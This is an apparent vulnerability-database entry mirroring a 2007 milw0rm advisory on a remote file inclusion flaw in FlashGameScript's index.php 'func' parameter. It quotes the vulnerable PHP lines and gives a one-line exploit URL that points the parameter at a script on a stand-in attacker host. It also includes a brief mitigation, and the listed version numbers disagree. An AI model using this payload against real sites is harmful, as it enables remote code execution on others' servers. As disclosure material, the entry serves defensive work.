header-logo
Suggest Exploit
vendor:
FlashGameScript
by:
JuMp-Er
7.5
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: FlashGameScript
Affected Version From: 1.5.2004
Affected Version To: 1.5.2004
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

FlashGameScript Remote Command Execution Vulnerability

The vulnerability exists in the index.php file of the FlashGameScript application. It allows an attacker to execute arbitrary commands by manipulating the 'func' parameter in a GET request. This can be exploited by sending a malicious link with the 'func' parameter pointing to an attacker-controlled script.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input, particularly any parameters used to execute commands or include files.
Source

Exploit-DB raw data:

         ___ ___                                        
_____   /   |   \            ___________   ______  _  __
\__  \ /    ~    \  ______ _/ ___\_  __ \_/ __ \ \/ \/ /
 / __ \\    Y    / /_____/ \  \___|  | \/\  ___/\     / 
(____  /\___|_  /           \___  >__|    \___  >\/\_/  
     \/       \/                \/            \/        


--------------------------------------------------------
Author          : JuMp-Er
Date            : feb, 21th 2007
Level           : Dangerous
contact:	: aH-crew[at]hotmail[dot]com
--------------------------------------------------------


Software description
--------------------------------------------------------
App             :FlashGameScript
Version		:1.5.4
URL:		:http://www.flashgamescript.com/
Price:		:$60
Description :
FlashGameScript: Flash Game Script is the latest arcade website script created by developers at ghoney.com and will be market by folks at FlashGameScript.com.
Our game site script is created to maximized arcade site owner.s profit with additional plug-in for alternative income opportunities.
-------------------------------------------------------


Vulnerability:
---------------
	     line 27: $absolutepath = $cfg[absolutepath];
at index.php line 28: $func =$_GET[func];
	     line 29: $pluginpath = $instdir."admin/plugins/";
---------------
Exploit:

http://www.somesite.com/index.php?func=http://attacker.com/evil_script?

---------------

Greetz to all members of active. Hacking Crew

# milw0rm.com [2007-02-22]

Navigation

Suggest Exploit

Services By CQR